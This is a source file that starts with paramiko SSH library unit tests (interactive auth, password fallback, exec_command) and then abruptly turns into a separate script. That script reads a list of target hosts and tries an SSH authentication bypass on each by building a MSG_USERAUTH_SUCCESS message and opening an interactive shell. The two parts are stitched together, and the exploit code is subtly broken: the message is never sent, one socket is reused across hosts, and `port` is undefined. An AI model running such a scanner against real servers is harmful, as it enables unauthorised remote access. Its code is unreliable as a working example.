        self.assert_(self.ts.is_active())

    def test_9_interactive_auth(self):
        """
        Verify keyboard-interactive auth works.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)

        def handler(title, instructions, prompts):
            # Record what the server asked, then answer every prompt with 'cat'.
            self.got_title = title
            self.got_instructions = instructions
            self.got_prompts = prompts
            return ['cat']
        remain = self.tc.auth_interactive('commie', handler)
        self.assertEquals(self.got_title, 'password')
        self.assertEquals(self.got_prompts, [('Password', False)])
        self.assertEquals([], remain)
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_A_interactive_auth_fallback(self):
        """
        Verify that a password auth attempt will fall back to "interactive"
        if password auth isn't supported but interactive is.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assert_(not event.isSet())
        self.ts.start_server(event, server)
        self.tc.ultra_debug = True
        self.tc.connect(hostkey=public_host_key)
        remain = self.tc.auth_password('commie', 'cat')
        self.assertEquals([], remain)
        event.wait(1.0)
        self.assert_(event.isSet())
        self.assert_(self.ts.is_active())

    def test_B_exec_command(self):
        """
        Verify that exec_command() does something reasonable.
        """
        self.setup_test_server()

        # Presumably NullServer rejects the command 'no' -- inferred from the
        # expected SSHException; confirm against NullServer.
        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        try:
            chan.exec_command('no')
            self.assert_(False)
        except SSHException, x:
            pass

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        # stdout and stderr arrive on separate file objects by default.
        f = chan.makefile()
        self.assertEquals('Hello there.\n', f.readline())
        self.assertEquals('', f.readline())
        f = chan.makefile_stderr()
        self.assertEquals('This is on stderr.\n', f.readline())
        self.assertEquals('', f.readline())

        # now try it with combined stdout/stderr
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        chan.set_combine_stderr(True)
        f = chan.makefile()
        self.assertEquals('Hello there.\n', f.readline())
        self.assertEquals('This is on stderr.\n', f.readline())
        self.assertEquals('', f.readline())
# Reads target hosts from the file named by the first command-line argument and,
# for each host, connects a TCP socket, starts a paramiko client Transport on it,
# and then tries to open a session and an interactive shell.
# NOTE(review): the status messages reference MSG_USERAUTH_SUCCESS, i.e. this
# probes hosts for an SSH authentication bypass. Run it only against systems you
# are explicitly authorized to test.
# NOTE(review): `port` is not defined in this chunk; presumably a module-level
# value set earlier in the file -- confirm.
try:
    # sys.argv[1] must name a readable file listing one target host per line.
    with open(sys.argv[1]) as ssh_targets:
        s = socket.socket()
        # splitlines() already drops the line terminators, so no per-entry .rstrip() is needed.
        ip_list = ssh_targets.read().splitlines()
        for ip in ip_list:
            # Errors for an individual host are printed, and the loop continues.
            try:
                print("Attempting to connect to {}:{}...".format(ip, port))
                s.connect((ip, port))
                msg = Message()
                trans = Transport(s)
                trans.start_client()
                print("Attempting to send MSG_USERAUTH_SUCCESS...")
                msg.add_byte(common.cMSG_USERAUTH_SUCCESS)
                cmd = trans.open_session()
                print("Attempting to load shell...")
                cmd.invoke_shell()
            except Exception as e:
                print(str(e))
except FileNotFoundError as e:
    print("File not found: {}".format(sys.argv[1]))
except Exception as e:
    # Any other top-level failure is reported here, e.g. the IndexError raised
    # when no command-line argument was given.
    print("Possible PEKBAC error: {}".format(str(e)))